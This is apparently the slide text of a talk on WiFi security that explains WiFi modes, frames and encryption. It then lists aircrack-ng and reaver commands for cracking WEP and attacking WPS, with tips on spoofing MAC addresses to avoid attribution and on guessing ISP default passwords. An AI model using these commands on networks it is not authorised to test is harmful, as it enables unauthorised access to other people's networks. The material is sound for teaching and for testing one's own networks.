The Myth of WiFi Security
by James Kegel
http://GeekBlog.TV
Twitter - @GeekBlogTV
Meet and Greet
James Kegel
and now...
...Public Speaker!
In The Beginning..
Fast Forward a Bit..
Now, you go.
Take a look at your neighbors; Do you see any of the following in the crowd
Do you fit one of these descriptions?
Foolish Assumptions
Since you are here, I am making a few assumptions..
YOU ARE...
Before we start...
WiFi: A Brief History
Simplified Timeline
Simplified Timeline
Simplified Timeline
802.11(x)-#
The lettered protocols
802.11a-1999
802.11b-1999
802.11g-2003
802.11n-2009
802.11ac---
WiFi Channels
802.11 Channels
The 6 Modes of WiFi
The 6 Modes of WiFi
Monitor Mode
This is juicy... More on this later
To enable:
# airmon-ng start wlan0
Master Mode
Managed Mode
Ad-Hoc Mode
# iw phy phy0 info | grep -A8 modes (check mode support)
Mesh Mode
Repeater Mode
Exactly what it sounds like
Nothing to see here for us.
Media Access Control
MAC Addresses
MAC Addresses Are Fun To Abuse
SHOW ME YOUR BITS!
OR
WiFi Frames
the stuff dreams are made of..
WiFi Frames at a Glance
Types of WiFi Frames
Management Frames
Management Frames cont.
Control Frames
Data Frames
I thought this talk was about hacking WiFi?!
I am a carpenter, and these are my tools:
I am a carpenter, and these are my tools:
WiFi Encryption
and Exploitation
WEP - Wired Equivalent Privacy
Popular WEP Attacks
Example WEP Attacks
It is implied that all attacks should start with you changing that MAC address, or using a disposable WiFi adapter.
Monitor Mode
# airmon-ng start wlan0
start monitor mode on interface wlan0
# airodump-ng -c # --bssid BSSID -w filename mon0
monitor chan # and BSSID and logs output to FILENAME with interface mon0
Fake Association
# aireplay-ng -1 0 -e SSID -a BSSID -h SPOOFMAC mon0
use your spoofed MAC to to try and fake-associate with BSSID named SSID
Example WEP Attacks cont.
It is implied that all attacks should start with you changing that MAC address, or using a disposable WiFi adapter.
ARP-Replay
# aireplay-ng -3 -b BSSID -h SPOOFMAC mon0
start ARP-replay attack at BSSID from SPOOFMAC on interface mon0
or
FRAG Attack
# aireplay-ng -5 -b BSSID -h SPOOFMAC mon0
or
ChopChop Attack
# aireplay-ng -4 -b BSSID -h SPOOFMAC mon0
# packetforge-ng -0 -a BSSID -h SPOOFMAC -k 255.255.255.255.255 -l 255.255.255.255 -y replay_dec.xor -w arp-request
# aireplay-ng -2 -r arp-request mon0
Finally, we hit the aircrack-ng to crack the .cap
# aircrack-ng -b BSSID filename*.cap
WPA1 & WPA2 Attacks, Tkip, CCMP
Popular WPA1/WPA2 Attacks
How does a WPA 1/2 Attack Work?
And last bit of advice...
The password is almost always 10-Digit-Numeric; If it is a 2WIRE# or ATT#, the PW is usually the resident's home phone number. Thanks, ATT tech-support!!
DeAuthentication Expanded
Tkip w/ Tkiptun-NG
Usage
WiFi Protected Setup
USAGE
# airmon-ng start wlan0
# reaver -i mon0 -b TARGMAC -vv
Cisco LEAP Enterprise
Meet The Attacker
Meet The Attacker
Cover Your Butt
(attacker & victim)
Advice for Victims
Advice for Attackers
Things To Remember..
Things To Remember..
(applause)